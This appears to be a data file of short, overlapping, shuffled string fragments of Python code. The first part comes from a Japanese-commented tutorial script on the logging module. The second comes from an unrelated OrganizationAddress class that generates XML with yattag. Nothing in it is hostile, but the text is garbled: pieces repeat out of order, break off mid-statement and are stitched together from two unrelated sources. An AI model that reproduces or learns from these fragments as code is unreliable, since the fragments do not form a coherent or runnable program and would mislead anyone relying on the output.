"range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i # b =",
"logging===\") # # logレベルの設定 # MODE = \"INFO\" # for i in range(5):",
"# for i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a =",
"* 2 # c = a + b # time.sleep(1) # # if",
"print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import",
"a = i # b = i * 2 # c = a",
"<filename>log/basic_log.py import time # print(\"===start: not use logging===\") # # logレベルの設定 # MODE",
"# # logレベルの設定 # MODE = \"INFO\" # for i in range(5): #",
"logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is not necessary when displaying imfomation on",
"time # print(\"===start: not use logging===\") # # logレベルの設定 # MODE = \"INFO\"",
"c = a + b time.sleep(1) # DEBUGレベルの処理 logging.debug(\"a:{}, b:{}\".format(a,b)) # INFOレベルの処理 logging.info(\"c:{}\".format(c))",
"# b = i * 2 # c = a + b #",
"== \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG ,",
"適当な処理・処理時間を再現 a = i b = i * 2 c = a +",
"= i * 2 c = a + b time.sleep(1) # DEBUGレベルの処理 logging.debug(\"a:{},",
"MODE = \"INFO\" # for i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現",
"logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is not necessary when",
"== \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start:",
"i # b = i * 2 # c = a + b",
"for i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i",
"適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i # b = i *",
"screen ) for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i",
"# 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b = i * 2 c",
"適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b = i * 2 c =",
") for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b",
"\"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use",
"necessary when displaying imfomation on the screen ) for i in range(5): #",
"# if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging #",
"import time # print(\"===start: not use logging===\") # # logレベルの設定 # MODE =",
"# print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\")",
"range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b = i * 2",
"logレベルの設定 # MODE = \"INFO\" # for i in range(5): # 適当な繰り返しの処理を再現 #",
"i * 2 # c = a + b # time.sleep(1) # #",
"not use logging===\") # # logレベルの設定 # MODE = \"INFO\" # for i",
"displaying imfomation on the screen ) for i in range(5): # 適当な繰り返しの処理を再現 #",
"use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is",
"MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG",
"+ b # time.sleep(1) # # if MODE == \"DEBUG\" or MODE ==",
"print(\"===start: use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg",
"適当な処理・処理時間を再現 # a = i # b = i * 2 # c",
"in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i # b",
"\"INFO\" # for i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a",
"b = i * 2 c = a + b time.sleep(1) # DEBUGレベルの処理",
"if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging # logレベルの設定",
"\"DEBUG\" or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\":",
"\"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\"",
", filename=\"log/basic_log.log\" # This kwarg is not necessary when displaying imfomation on the",
"filename=\"log/basic_log.log\" # This kwarg is not necessary when displaying imfomation on the screen",
"# 適当な処理・処理時間を再現 a = i b = i * 2 c = a",
"in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b = i *",
"use logging===\") # # logレベルの設定 # MODE = \"INFO\" # for i in",
"for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b =",
"kwarg is not necessary when displaying imfomation on the screen ) for i",
"a + b # time.sleep(1) # # if MODE == \"DEBUG\" or MODE",
"# 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i # b = i",
"not necessary when displaying imfomation on the screen ) for i in range(5):",
"# time.sleep(1) # # if MODE == \"DEBUG\" or MODE == \"INFO\": #",
"time.sleep(1) # # if MODE == \"DEBUG\" or MODE == \"INFO\": # print(\"a:{},",
"This kwarg is not necessary when displaying imfomation on the screen ) for",
"b # time.sleep(1) # # if MODE == \"DEBUG\" or MODE == \"INFO\":",
"b:{}\".format(a,b)) # if MODE == \"INFO\": # print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging",
"logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is not",
"# logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is not necessary when displaying",
"# c = a + b # time.sleep(1) # # if MODE ==",
"i b = i * 2 c = a + b time.sleep(1) #",
"# if MODE == \"DEBUG\" or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) #",
"# logレベルの設定 # MODE = \"INFO\" # for i in range(5): # 適当な繰り返しの処理を再現",
"b = i * 2 # c = a + b # time.sleep(1)",
"print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This",
"# MODE = \"INFO\" # for i in range(5): # 適当な繰り返しの処理を再現 # #",
"# This kwarg is not necessary when displaying imfomation on the screen )",
"on the screen ) for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a",
"logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is not necessary when displaying imfomation"
] |
[
"None if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return",
"LocalityName) -> None: self.__localityName = None if val is None else LocalityName(val) @property",
"else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val:",
"localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode:",
"val: LocalityName) -> None: self.__localityName = None if val is None else LocalityName(val)",
"self.__addressText = None if val is None else AddressText(val) @property def supplementalAddressText(self) ->",
"# Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText =",
"def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is None",
"__countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName =",
"# Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText",
"is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def",
"@property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) ->",
"StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode",
"doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName)",
"self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName)",
"None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self,",
"line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not",
"typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\")",
"LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o:",
"if val is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") ->",
"self.__addressTypeName = None if val is None else AddressTypeName(val) @property def addressText(self) ->",
"without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName =",
"= None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode =",
"PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode)",
"line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not",
"AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None",
"@countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is",
"def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is None",
"line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None:",
"def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText:",
"if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode",
"LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an",
"-> None: self.__countryCode = None if val is None else CountryCode(val) @property def",
"not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText",
"else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc()",
"if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\",",
"CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None",
"= None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode =",
"from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText",
"val: CountryCode) -> None: self.__countryCode = None if val is None else CountryCode(val)",
"( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\"",
"self.__postalCode = None if val is None else PostalCode(val) @property def countryCode(self) ->",
"Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText,",
"localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName",
"doc = Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName",
"LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode)",
"= o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName",
"StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict =",
"o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode",
"self.__localityName = None if val is None else LocalityName(val) @property def stateCode(self) ->",
"-> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName =",
"= supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode =",
"not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode",
"= Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is",
"keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName",
"addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName",
"else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val:",
"SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__(",
"addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText",
"self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None:",
"not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode",
"o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None,",
"-> None: self.__postalCode = None if val is None else PostalCode(val) @property def",
"self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode",
"@stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is",
"@property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) ->",
"val: StateCode) -> None: self.__stateCode = None if val is None else StateCode(val)",
"physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName:",
"__countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName:",
"not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode",
"= ( None if val is None else SupplementalAddressText(val) ) @property def localityName(self)",
"AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode",
"= o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o,",
"= o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode =",
"= o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode =",
"self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode)",
"self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode)",
"PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an organization.",
"countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def",
"is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def",
"doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is",
"stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self)",
"is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def",
"None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is",
"def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is None",
"StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\"",
"= o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode =",
"self.__stateCode = None if val is None else StateCode(val) @property def postalCode(self) ->",
"None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self,",
"if val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode",
"o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\")",
"line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not",
"from yattag import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName,",
"-> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode =",
"line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not",
"self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText)",
"return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if",
"self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) ->",
"SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val)",
"addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode",
"isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText",
"= doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\",",
"import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress:",
"@localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if val is",
"= None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode =",
"not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\", self.__countyCode) return doc.getvalue()",
"attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText =",
"= addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode =",
"if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName",
"self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif",
"val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName",
"@property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) ->",
"an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode",
"CountyCode) -> None: self.__countyCode = None if val is None else CountyCode(val) def",
"None: self.__addressText = None if val is None else AddressText(val) @property def supplementalAddressText(self)",
"= postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName:",
"= None if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode:",
"countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from object",
"= addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode =",
"if val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode",
"self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val",
"-> None: self.__localityName = None if val is None else LocalityName(val) @property def",
"= o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode =",
"attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText =",
"addressText(self, val: AddressText) -> None: self.__addressText = None if val is None else",
"self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode",
"None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName",
"None: self.__stateCode = None if val is None else StateCode(val) @property def postalCode(self)",
"PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None",
"AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None",
"return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if",
"def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is None",
"val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None else",
"self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None:",
"o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking",
"( None if val is None else SupplementalAddressText(val) ) @property def localityName(self) ->",
"else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val:",
"o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\")",
"val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter",
"is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if",
"StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None",
"is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc",
"= None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode =",
"if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\",",
"self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode",
"postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return",
"AddressTypeName) -> None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property",
"*, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None,",
"o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign",
"AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName",
"@property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) ->",
"o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName",
"addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode",
"self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText)",
"AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText)",
"addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName:",
"def addressText(self, val: AddressText) -> None: self.__addressText = None if val is None",
"def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None:",
"None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property def addressText(self)",
"= o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary",
"__addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode:",
"return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if",
"self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking",
"= None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText",
"AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The",
"from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, )",
"OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText",
"StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode)",
"self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode",
"self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if val",
"None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None,",
"# Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\")",
"self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode",
"None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self,",
"val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter",
"attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText",
"name: str = \"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag",
"= o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking self.addressTypeName =",
"None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def",
"self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\", self.__countyCode)",
"self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None:",
") @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName)",
"tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None:",
"str = \"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag =",
"= countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter",
"CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None",
"= None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o,",
"o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode",
"LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode",
"-> None: self.__stateCode = None if val is None else StateCode(val) @property def",
"None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is",
"supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode:",
"return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if",
"is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def",
"if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\",",
"self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode",
"generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc() line = doc.line",
"= o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from",
"SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val:",
"self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val",
"PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if",
"else: # Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText",
"stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode:",
"CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without",
"@property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) ->",
"addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode:",
"return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None",
"None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None,",
"self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else:",
"self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None:",
"None if val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return",
"self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes",
"import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode,",
"None: self.__countyCode = None if val is None else CountyCode(val) def generateXML(self, name:",
"countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is None else",
"self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if val",
